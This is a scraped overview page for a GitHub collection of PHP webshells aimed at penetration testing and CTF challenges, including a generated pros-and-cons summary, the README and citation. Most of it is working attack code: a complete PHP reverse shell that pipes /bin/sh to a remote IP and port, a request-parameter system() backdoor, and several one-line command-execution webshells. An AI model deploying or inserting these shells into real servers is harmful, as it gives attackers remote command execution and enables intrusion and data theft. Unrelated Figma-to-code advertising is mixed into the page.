Convert Figma logo to code with AI

JohnTroony logophp-webshells

Common PHP webshells you might need for your Penetration Testing assignments or CTF challenges. Do not host the file(s) on your server!

1,872
773
1,872
9
View on GitHub

Quick Overview

The JohnTroony/php-webshells repository is a collection of various PHP-based web shells, which are small scripts that provide remote access and control over a web server. These web shells can be used for a variety of purposes, including system administration, penetration testing, and malicious activities.

Pros

  • Provides a wide range of web shell options for different use cases
  • Can be used for legitimate purposes, such as remote server management
  • Allows for easy deployment and execution of the web shells

Cons

  • The web shells can be used for malicious purposes, such as unauthorized access and data theft
  • The repository may be considered a security risk and could be used by malicious actors
  • The web shells may not be actively maintained or updated, potentially leading to security vulnerabilities

Code Examples

PHP Reverse Shell

<?php
// PHP Reverse Shell
$ip = '192.168.1.100';
$port = 4444;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        exit(1);
    }
    if ($pid) {
        exit(0);
    }
    if (posix_setsid() == -1) {
        exit(1);
    }
    $daemon = 1;
} else {
    $daemon = 0;
}

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),
   1 => array("pipe", "w"),
   2 => array("pipe", "w")
);

$process = proc_open($shell, $descriptorspec, $pipes, null, null);

if (!is_resource($process)) {
    exit(1);
}

while (1) {
    if (feof($pipes[1])) {
        break;
    }
    if (feof($sock)) {
        break;
    }

    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {
        if ($debug) {
            echo "SOCK READ\n";
        }
        $input = fread($sock, $chunk_size);
        if ($debug) {
            echo "SOCK: $input\n";
        }
        fwrite($pipes[0], $input);
    }

    if (in_array($pipes[1], $read_a)) {
        if ($debug) {
            echo "STDOUT READ\n";
        }
        $output = fread($pipes[1], $chunk_size);
        if ($debug) {
            echo "STDOUT: $output\n";
        }
        fwrite($sock, $output);
    }

    if (in_array($pipes[2], $read_a)) {
        if ($debug) {
            echo "STDERR READ\n";
        }
        $output = fread($pipes[2], $chunk_size);
        if ($debug) {
            echo "STDERR: $output\n";
        }
        fwrite($sock, $output);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

This code implements a PHP reverse shell, which allows an attacker to execute commands on the target system and receive the output back on their own machine.

PHP Backdoor

<?php
// PHP Backdoor
if (isset($_REQUEST['cmd'])) {
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    die;
}

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Contributing

To contribute other shells not listed here... Fork, Push the changes to your repo, then before you request for a Pull, make sure to include a simple description of your php web-shell and include a screen-shot of the web-shell (as hosted in your localhost).

PHP Webshells

Common PHP shells is a collection of PHP webshells that you may need for your penetration testing (PT) cases or in a CTF challenge.

Do not host any of the files on a publicly-accessible webserver (unless you know what you are up-to).

These are provided for education purposes only and legitimate PT cases.

I'll keep updating the collection whnever I stumble on any new webshell.

FYI

For basic features, I recommend one-liners like :

<?php echo passthru($_GET['cmd']); ?>

<?php echo exec($_POST['cmd']); ?>

<?php system($_GET['cmd']); ?>

<?php passthru($_REQUEST['cmd']); ?>

Cite:

@software{jacques_pharand_2020_3748072,
  author       = {Jacques Pharand and
                  John Troon and
                  Javier Izquierdo Vera},
  title        = {JohnTroony/php-webshells: Collection CS1},
  month        = apr,
  year         = 2020,
  publisher    = {Zenodo},
  version      = {1.1},
  doi          = {10.5281/zenodo.3748072},
  url          = {https://doi.org/10.5281/zenodo.3748072}
}